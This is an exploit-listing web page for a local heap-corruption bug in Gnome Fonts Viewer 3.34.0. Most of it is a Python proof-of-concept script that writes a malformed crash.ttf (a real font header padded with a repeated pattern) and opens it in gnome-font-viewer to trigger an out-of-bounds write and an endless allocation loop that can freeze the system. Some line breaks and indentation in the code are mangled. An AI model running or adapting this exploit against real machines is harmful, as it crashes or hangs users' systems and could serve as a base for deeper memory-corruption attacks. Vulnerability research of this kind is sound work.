Gnome fonts viewer 3.34.0 heap corruption Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-09-11 | Type : local | Platform : linux
This exploit / vulnerability Gnome fonts viewer 3.34.0 heap corruption is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

#!/usr/bin/env python3
# Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption
# Date: 2020-09-10
# Exploit Author: Cody Winkler
# Vendor Homepage: gnome.org
# Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html
# Version: 3.34.0
# Tested On: Ubuntu 20.04.1 LTS
#
# Note: May take a few tries. Too many consecutive runs can freeze OS.
# This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped.

from os import system

this_pattern = "BEEF"*21125 # needs to be filled to len ~84500

# TTF file header (probably has some junk data in it) taken from MesloLGS
NF Regular.ttf

ttf_header = ("\x00\x01\x00\x00\x00\x13\x01\x00\x00\x04\x00\x30\x46\x46\x54"
"\x4d\x75\xfe\x73\xdd\x00\x13\xb6\x0c\x00\x00\x00\x1c\x47\x44\x45"
"\x46\x4d\x76\x5d\xda\x00\x13\xb0\xac\x00\x00\x04\xaa\x47\x50\x4f"
"\x53\x44\x76\x4c\x75\x00\x13\xb5\xec\x00\x00\x00\x20\x47\x53\x55"
"\x42\x09\xf6\x0b\xdc\x00\x13\xb5\x58\x00\x00\x00\x92\x4f\x53\x2f"
"\x32\x8d\xbd\x8e\x75\x00\x00\x01\xb8\x00\x00\x00\x60\x50\x66\x45"
"\x64\x5b\xd3\xe9\x6b\x00\x13\xb6\x28\x00\x00\x02\x50\x63\x6d\x61"
"\x70\xbf\x0d\x76\x7c\x00\x00\x34\x30\x00\x00\x0a\x36\x63\x76\x74"
"\x20\x28\xfd\x02\x16\x00\x00\x48\x98\x00\x00\x00\x38\x66\x70\x67"
"\x6d\x31\xfc\xa0\x95\x00\x00\x3e\x68\x00\x00\x09\x96\x67\x61\x73"
"\x70\xff\xff\x00\x10\x00\x13\xb0\xa4\x00\x00\x00\x08\x67\x6c\x79"
"\x66\xd6\x2f\x24\x7c\x00\x00\xac\xf0\x00\x11\xd8\x34\x68\x65\x61"
"\x64\x04\xe3\x81\x66\x00\x00\x01\x3c\x00\x00\x00\x36\x68\x68\x65"
"\x61\x0a\xf4\x01\xa2\x00\x00\x01\x74\x00\x00\x00\x24\x68\x6d\x74"
"\x78\x93\xdf\x7e\x92\x00\x00\x02\x18\x00\x00\x32\x16\x6c\x6f\x63"
"\x61\xe6\x44\x45\x24\x00\x00\x48\xd0\x00\x00\x64\x20\x6d\x61\x78"
"\x70\x1a\xa2\x0b\x9c\x00\x00\x01\x98\x00\x00\x00\x20\x6e\x61\x6d"
"\x65\x62\x13\x17\xa4\x00\x12\x85\x24\x00\x00\x0b\x9d\x70\x6f\x73"
"\x74\xbb\xe8\x29\xcf\x00\x12\x90\xc4\x00\x01\x1f\xdd\x70\x72\x65"
"\x70\xb4\xc5\xc5\x72\x00\x00\x48\x00\x00\x00\x00\x95\x00\x01\x00"
"\x00\x00\x02\x07\x2b\xd0\x81\xfc\x0f\x5f\x0f\x3c\xf5\x02\x9f\x08"
"\x00\x00\x00\x00\x00\xc5\x74\x19\x33\x00\x00\x00\x00\xda\x9d\x14"
"\xf1\xfd\x41\xfc\xfc\x05\xdf\x0a")

print('[+] Generating crash.ttf with DEADDEAD')

with open("./crash.ttf", 'w') as f:
f.write(ttf_header)
f.write(this_pattern)
f.close()
print('[+] Done')

print('[+] Triggering out-of-bounds write in gnome-font-viewer')
system("/usr/bin/gnome-font-viewer ./crash.ttf")